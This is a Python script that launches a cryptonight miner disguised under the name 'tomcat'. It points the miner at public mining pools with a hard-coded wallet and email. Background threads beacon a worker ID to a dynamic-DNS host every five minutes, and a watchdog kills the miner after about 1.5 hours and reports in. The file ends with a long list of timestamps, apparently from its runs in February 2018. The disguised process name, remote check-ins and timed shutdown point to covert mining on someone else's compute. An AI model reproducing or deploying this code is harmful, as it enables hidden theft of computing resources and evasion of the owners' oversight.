import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:31:07.267253
#2018-02-17 17:19:01.555527
#2018-02-17 19:07:04.956161
#2018-02-17 20:54:06.345380
#2018-02-17 22:41:06.758089
#2018-02-18 00:24:05.089634
#2018-02-18 02:14:07.144647
#2018-02-18 04:01:07.170357
#2018-02-18 05:49:05.425982
#2018-02-18 07:41:05.334105
#2018-02-18 09:28:04.284286
#2018-02-18 11:13:07.072893
#2018-02-18 13:00:09.359817
#2018-02-18 14:48:06.474339
#2018-02-18 16:36:01.942706
#2018-02-18 18:25:01.649282
#2018-02-18 20:11:06.078994
#2018-02-18 21:57:04.032201
#2018-02-18 23:46:01.651939
#2018-02-19 01:32:03.994919
#2018-02-19 03:20:08.548043
#2018-02-19 05:05:08.670799
#2018-02-19 06:49:05.888456
#2018-02-19 08:39:01.642814
#2018-02-19 10:28:05.890027
#2018-02-19 12:16:07.745595
#2018-02-19 14:02:06.197549
#2018-02-19 15:52:06.659163
#2018-02-19 17:40:09.787255
#2018-02-19 19:27:05.595758
#2018-02-19 21:13:07.585903
#2018-02-19 23:01:08.215794
#2018-02-20 00:44:06.925895
#2018-02-20 02:34:07.400046
#2018-02-20 04:25:08.267184
#2018-02-20 06:10:10.105021
#2018-02-20 07:54:07.172142
#2018-02-20 09:39:05.436312
#2018-02-20 11:22:08.162675
#2018-02-20 13:10:08.223592
#2018-02-20 14:53:07.665608
#2018-02-20 16:38:01.356556
#2018-02-20 18:23:08.905010
#2018-02-20 20:13:04.090137
#2018-02-20 21:59:06.487584
#2018-02-20 23:42:04.745075
#2018-02-21 01:26:06.897149
#2018-02-21 03:13:07.755210
#2018-02-21 05:01:01.673104
#2018-02-21 06:48:07.316062
#2018-02-21 08:35:08.717691
#2018-02-21 10:20:07.926839
#2018-02-21 12:08:01.367122
#2018-02-21 13:57:04.819720
#2018-02-21 15:41:04.749244
#2018-02-21 17:32:08.067451
#2018-02-21 19:20:07.169441
#2018-02-21 21:08:01.649528
#2018-02-21 22:54:05.965503
#2018-02-22 00:43:04.093776
#2018-02-22 02:31:05.698306
#2018-02-22 04:17:05.893162
#2018-02-22 06:04:05.480438
#2018-02-22 07:50:10.120950
#2018-02-22 09:41:05.756405
#2018-02-22 11:26:04.307740
#2018-02-22 13:13:07.138353
#2018-02-22 15:03:05.917511
#2018-02-22 16:46:01.747314
#2018-02-22 18:32:07.917202
#2018-02-22 20:25:08.144302
#2018-02-22 22:13:04.631873
#2018-02-22 23:59:05.439951
#2018-02-23 01:47:05.914197
#2018-02-23 03:32:06.585004
#2018-02-23 05:16:07.672836
#2018-02-23 07:01:07.875936
#2018-02-23 08:51:01.880490
#2018-02-23 11:09:06.646338
#2018-02-23 13:02:04.599490
#2018-02-23 14:47:01.842658
#2018-02-23 16:37:08.373700
#2018-02-23 18:24:05.197380
#2018-02-23 20:08:06.146055
#2018-02-23 21:56:06.524113
#2018-02-23 23:44:04.211895
#2018-02-24 01:38:01.662461
#2018-02-24 03:27:01.852676
#2018-02-24 05:12:06.833242
#2018-02-24 07:00:09.039325
#2018-02-24 08:50:08.816675
#2018-02-24 10:48:06.760106
#2018-02-24 12:35:07.635978
#2018-02-24 14:23:03.943367
#2018-02-24 16:11:07.364325
#2018-02-24 18:03:06.623561
#2018-02-24 19:50:09.375068
#2018-02-24 21:35:06.490032
#2018-02-25 00:24:01.331000
#2018-02-25 03:30:07.927701
#2018-02-25 06:20:06.227233
#2018-02-25 11:34:07.257826
#2018-02-25 13:07:01.495840
#2018-02-25 14:40:01.300693
#2018-02-25 16:12:02.142283